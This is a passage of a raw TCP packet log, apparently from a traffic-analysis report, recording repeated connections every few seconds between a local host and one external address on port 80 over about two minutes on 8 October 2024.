              Oct 8, 2024 11:02:53.162610054 CEST6225280192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:53.167992115 CEST8062252188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:53.168087959 CEST6225280192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:53.173146963 CEST8062252188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:53.175096035 CEST6225280192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:53.193588972 CEST6225280192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:53.193711042 CEST6225280192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:53.198345900 CEST8062252188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:53.198407888 CEST8062252188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:57.198698997 CEST6225380192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:57.203797102 CEST8062253188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:57.203896046 CEST6225380192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:57.203972101 CEST6225380192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:57.208884954 CEST8062253188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:57.209351063 CEST8062253188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:57.210105896 CEST6225480192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:57.215049982 CEST8062254188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:57.215125084 CEST6225480192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:57.215179920 CEST6225480192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:57.220347881 CEST8062254188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:57.220647097 CEST8062254188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:01.229247093 CEST6225580192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:01.234306097 CEST8062255188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:01.235193968 CEST6225580192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:01.235275984 CEST6225580192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:01.539417028 CEST6225580192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:01.681230068 CEST8062255188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:01.681433916 CEST8062255188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:01.683087111 CEST8062255188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:01.687671900 CEST6225680192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:01.692917109 CEST8062256188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:01.693002939 CEST6225680192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:01.696805000 CEST6225680192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:01.698132992 CEST8062256188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:01.698182106 CEST6225680192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:01.700979948 CEST6225680192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:01.701693058 CEST8062256188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:01.702924967 CEST8062256188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:01.705774069 CEST8062256188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:05.730051041 CEST6225780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:05.735197067 CEST8062257188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:05.735325098 CEST6225780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:05.735538006 CEST6225780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:05.740292072 CEST8062257188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:05.740458965 CEST8062257188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:05.741695881 CEST6225880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:05.746563911 CEST8062258188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:05.746680021 CEST6225880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:05.746838093 CEST6225880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:05.751620054 CEST8062258188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:05.751734972 CEST8062258188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:09.760999918 CEST6228680192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:09.766259909 CEST8062286188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:09.766376972 CEST6228680192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:09.766518116 CEST6228680192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:09.771374941 CEST8062286188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:09.771598101 CEST8062286188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:09.772245884 CEST6228780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:09.777307987 CEST8062287188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:09.777390003 CEST6228780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:09.777503967 CEST6228780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:09.782272100 CEST8062287188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:09.782500029 CEST8062287188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:13.814388990 CEST6228880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:13.819458008 CEST8062288188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:13.819557905 CEST6228880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:13.819681883 CEST6228880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:13.824645042 CEST8062288188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:13.824944973 CEST8062288188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:13.826003075 CEST6228980192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:13.830993891 CEST8062289188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:13.831078053 CEST6228980192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:13.831142902 CEST6228980192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:13.836168051 CEST8062289188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:13.837037086 CEST8062289188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:17.839881897 CEST6229080192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:17.844736099 CEST8062290188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:17.846014023 CEST6229080192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:17.846098900 CEST6229080192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:17.850867033 CEST8062290188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:17.851165056 CEST8062290188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:17.856283903 CEST6229180192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:17.861192942 CEST8062291188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:17.861368895 CEST6229180192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:17.861368895 CEST6229180192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:17.866205931 CEST8062291188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:17.866431952 CEST8062291188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:21.870786905 CEST6229280192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:21.875585079 CEST8062292188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:21.875690937 CEST6229280192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:21.875823975 CEST6229280192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:21.880631924 CEST8062292188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:21.880798101 CEST8062292188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:21.882119894 CEST6229380192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:21.886919975 CEST8062293188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:21.887016058 CEST6229380192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:21.887191057 CEST6229380192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:21.891990900 CEST8062293188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:21.892496109 CEST8062293188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:25.917361975 CEST6229780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:25.922148943 CEST8062297188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:25.922277927 CEST6229780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:25.922327042 CEST6229780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:25.927123070 CEST8062297188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:25.927361965 CEST8062297188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:25.928363085 CEST6229880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:25.933212996 CEST8062298188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:25.935595036 CEST6229880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:25.935725927 CEST6229880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:25.940500021 CEST8062298188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:25.940885067 CEST8062298188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:29.961530924 CEST6231780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:29.966304064 CEST8062317188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:29.966433048 CEST6231780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:29.971523046 CEST8062317188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:29.971676111 CEST6231780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:30.031838894 CEST6231780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:30.031938076 CEST6231780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:30.034828901 CEST6231880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:30.036678076 CEST8062317188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:30.036732912 CEST8062317188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:30.039637089 CEST8062318188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:30.040086031 CEST6231880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:30.042226076 CEST6231880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:30.045115948 CEST8062318188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:30.045689106 CEST6231880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:30.047044992 CEST8062318188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:30.047655106 CEST6231880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:30.050446033 CEST8062318188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:30.052428961 CEST8062318188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:34.667705059 CEST6232580192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:34.672637939 CEST8062325188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:34.672804117 CEST6232580192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:34.672911882 CEST6232580192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:34.677742958 CEST8062325188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:34.677998066 CEST8062325188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:34.680433989 CEST6232680192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:34.685344934 CEST8062326188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:34.686851025 CEST6232680192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:34.686928988 CEST6232680192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:34.691787958 CEST8062326188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:34.691981077 CEST8062326188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:38.700870991 CEST6232780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:38.706135035 CEST8062327188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:38.706224918 CEST6232780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:38.706401110 CEST6232780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:38.711222887 CEST8062327188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:38.711458921 CEST8062327188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:38.713620901 CEST6232880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:38.718579054 CEST8062328188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:38.718666077 CEST6232880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:38.718795061 CEST6232880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:38.723659039 CEST8062328188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:38.724102020 CEST8062328188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:42.743686914 CEST6232980192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:42.750745058 CEST8062329188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:42.750827074 CEST6232980192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:42.751023054 CEST6232980192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:42.757971048 CEST8062329188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:42.758400917 CEST8062329188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:42.760466099 CEST6233080192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:42.767199993 CEST8062330188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:42.767340899 CEST6233080192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:42.767398119 CEST6233080192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:42.774342060 CEST8062330188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:42.774652958 CEST8062330188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:46.802853107 CEST6235280192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:46.808001041 CEST8062352188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:46.808094978 CEST6235280192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:46.808346987 CEST6235280192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:46.813168049 CEST8062352188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:46.813180923 CEST8062352188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:46.815010071 CEST6235380192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:46.819890976 CEST8062353188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:46.819967031 CEST6235380192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:46.820125103 CEST6235380192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:46.824922085 CEST8062353188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:46.824959993 CEST8062353188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:50.845453024 CEST6236780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:50.851366043 CEST8062367188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:50.851465940 CEST6236780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:50.851618052 CEST6236780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:50.856775999 CEST8062367188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:50.857012987 CEST8062367188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:50.860575914 CEST6236880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:50.866666079 CEST8062368188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:50.867166996 CEST6236880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:50.872479916 CEST8062368188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:50.872592926 CEST6236880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:50.872802973 CEST6236880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:50.872802973 CEST6236880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:50.877700090 CEST8062368188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:50.877727985 CEST8062368188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:54.886898994 CEST6236980192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:54.891741991 CEST8062369188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:54.891827106 CEST6236980192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:54.891944885 CEST6236980192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:54.896671057 CEST8062369188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:54.896802902 CEST8062369188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:54.898098946 CEST6237080192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:54.902934074 CEST8062370188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:54.903021097 CEST6237080192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:54.903109074 CEST6237080192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:54.908006907 CEST8062370188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:54.908195972 CEST8062370188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:58.984750986 CEST6237180192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:58.989618063 CEST8062371188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:58.991024017 CEST6237180192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:58.991024017 CEST6237180192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:58.995933056 CEST8062371188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:58.996295929 CEST8062371188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:59.005722046 CEST6237280192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:59.011217117 CEST8062372188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:59.011291027 CEST6237280192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:59.011378050 CEST6237280192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:59.016443968 CEST8062372188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:59.016522884 CEST8062372188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:59.016525984 CEST6237280192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:59.016607046 CEST6237280192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:59.021377087 CEST8062372188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:59.021733999 CEST8062372188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:03.046051979 CEST6237380192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:03.050960064 CEST8062373188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:03.051085949 CEST6237380192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:03.051415920 CEST6237380192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:03.056183100 CEST8062373188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:03.056348085 CEST8062373188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:03.057945013 CEST6237480192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:03.062715054 CEST8062374188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:03.062792063 CEST6237480192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:03.062908888 CEST6237480192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:03.067709923 CEST8062374188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:03.068022966 CEST8062374188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:07.158662081 CEST6237580192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:07.163507938 CEST8062375188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:07.163682938 CEST6237580192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:07.163765907 CEST6237580192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:07.168540955 CEST8062375188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:07.168725014 CEST8062375188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:07.170476913 CEST6237680192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:07.175417900 CEST8062376188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:07.175477982 CEST6237680192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:07.175585985 CEST6237680192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:07.180321932 CEST8062376188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:07.180589914 CEST8062376188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:11.201250076 CEST6237780192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:11.206079960 CEST8062377188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:11.206154108 CEST6237780192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:11.206233025 CEST6237780192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:11.211034060 CEST8062377188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:11.211369038 CEST8062377188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:11.212757111 CEST6237880192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:11.217554092 CEST8062378188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:11.217609882 CEST6237880192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:11.217703104 CEST6237880192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:11.222455978 CEST8062378188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:11.223500967 CEST8062378188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:15.232490063 CEST6237980192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:15.237525940 CEST8062379188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:15.237667084 CEST6237980192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:15.237845898 CEST6237980192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:15.242813110 CEST8062379188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:15.243350029 CEST8062379188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:15.245043993 CEST6238080192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:15.250166893 CEST8062380188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:15.250257969 CEST6238080192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:15.250338078 CEST6238080192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:15.255434036 CEST8062380188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:15.255536079 CEST8062380188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:19.280330896 CEST6238180192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:19.285136938 CEST8062381188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:19.285212994 CEST6238180192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:19.285397053 CEST6238180192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:19.290174007 CEST8062381188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:19.290206909 CEST8062381188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:19.292757034 CEST6238280192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:19.297573090 CEST8062382188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:19.297638893 CEST6238280192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:19.297791004 CEST6238280192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:19.302573919 CEST8062382188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:19.302622080 CEST8062382188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:23.434814930 CEST6238380192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:23.439714909 CEST8062383188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:23.439791918 CEST6238380192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:23.439932108 CEST6238380192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:23.444794893 CEST8062383188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:23.444830894 CEST8062383188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:23.447530031 CEST6238480192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:23.452395916 CEST8062384188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:23.452461004 CEST6238480192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:23.452800989 CEST6238480192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:23.457588911 CEST8062384188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:23.457603931 CEST8062384188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:23.457642078 CEST6238480192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:23.457742929 CEST6238480192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:23.462960958 CEST8062384188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:23.462985992 CEST8062384188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:27.482454062 CEST6238780192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:27.487500906 CEST8062387188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:27.487575054 CEST6238780192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:27.487709999 CEST6238780192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:27.492449045 CEST8062387188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:27.492731094 CEST8062387188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:27.494091988 CEST6238880192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:27.498946905 CEST8062388188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:27.499022007 CEST6238880192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:27.499104977 CEST6238880192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:27.503914118 CEST8062388188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:27.504045010 CEST8062388188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:31.512937069 CEST6238980192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:31.517919064 CEST8062389188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:31.521071911 CEST6238980192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:31.521341085 CEST6238980192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:31.526118994 CEST8062389188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:31.526177883 CEST8062389188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:31.527420998 CEST6239080192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:31.532198906 CEST8062390188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:31.535413027 CEST6239080192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:31.535413027 CEST6239080192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:31.540210009 CEST8062390188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:31.540474892 CEST8062390188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:35.543083906 CEST6239180192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:35.549705029 CEST8062391188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:35.549834967 CEST6239180192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:35.550025940 CEST6239180192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:35.555095911 CEST8062391188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:35.555691957 CEST8062391188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:35.563429117 CEST6239280192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:35.568304062 CEST8062392188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:35.568378925 CEST6239280192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:35.568541050 CEST6239280192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:35.573267937 CEST8062392188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:35.573506117 CEST8062392188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:39.749041080 CEST6239380192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:39.753854990 CEST8062393188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:39.754189014 CEST6239380192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:39.754349947 CEST6239380192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:39.759280920 CEST8062393188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:39.759675026 CEST8062393188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:39.760914087 CEST6239480192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:39.765770912 CEST8062394188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:39.767498016 CEST6239480192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:39.767498970 CEST6239480192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:39.772413015 CEST8062394188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:39.772747993 CEST8062394188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:43.792958021 CEST6239580192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:43.797787905 CEST8062395188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:43.799513102 CEST6239580192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:43.799720049 CEST6239580192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:43.804486990 CEST8062395188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:43.804763079 CEST8062395188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:43.859661102 CEST6239680192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:43.864444017 CEST8062396188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:43.864582062 CEST6239680192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:43.903882980 CEST6239680192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:44.138087034 CEST8062396188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:44.149652958 CEST8062396188.241.183.45192.168.2.6
